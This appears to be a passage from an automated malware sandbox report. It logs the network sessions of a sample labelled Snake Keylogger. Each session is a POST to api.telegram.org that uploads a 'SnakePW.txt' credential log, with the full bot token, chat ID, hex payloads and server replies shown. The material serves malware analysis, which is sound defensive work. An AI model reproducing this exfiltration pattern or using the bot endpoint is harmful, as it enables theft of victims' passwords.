                                                                    2022-06-26 07:34:15 UTC378OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 65 31 34 30 33 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570e1403dbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:15 UTC379INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:15 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:15 UTC379INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67002,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228855,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    225192.168.2.550135149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:15 UTC379OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570e4f9f4c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:15 UTC380OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 65 34 66 39 66 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570e4f9f4cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:16 UTC380INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:16 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:16 UTC381INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67003,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228856,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    226192.168.2.550136149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:16 UTC381OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570e8d9c05
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:16 UTC381OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 65 38 64 39 63 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570e8d9c05Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:16 UTC382INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:16 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:16 UTC382INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67004,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228856,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    227192.168.2.550137149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:16 UTC383OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570ecb98cc
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:16 UTC383OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 65 63 62 39 38 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570ecb98ccContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:16 UTC384INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:16 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:16 UTC384INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67005,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228856,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    228192.168.2.550138149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:17 UTC385OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570f0733b7
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:17 UTC385OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 66 30 37 33 33 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570f0733b7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:17 UTC385INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:17 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:17 UTC386INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67006,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228857,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    229192.168.2.550140149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:17 UTC386OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570f537ed5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:17 UTC387OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 66 35 33 37 65 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570f537ed5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:17 UTC387INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:17 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:17 UTC387INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67007,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228857,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    23192.168.2.549791149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:47 UTC38OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d9e4fdfa
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:47 UTC39OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 39 65 34 66 64 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d9e4fdfaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:48 UTC39INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:48 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:48 UTC40INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66770,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228768,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    230192.168.2.550141149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:17 UTC388OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570f8a5578
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
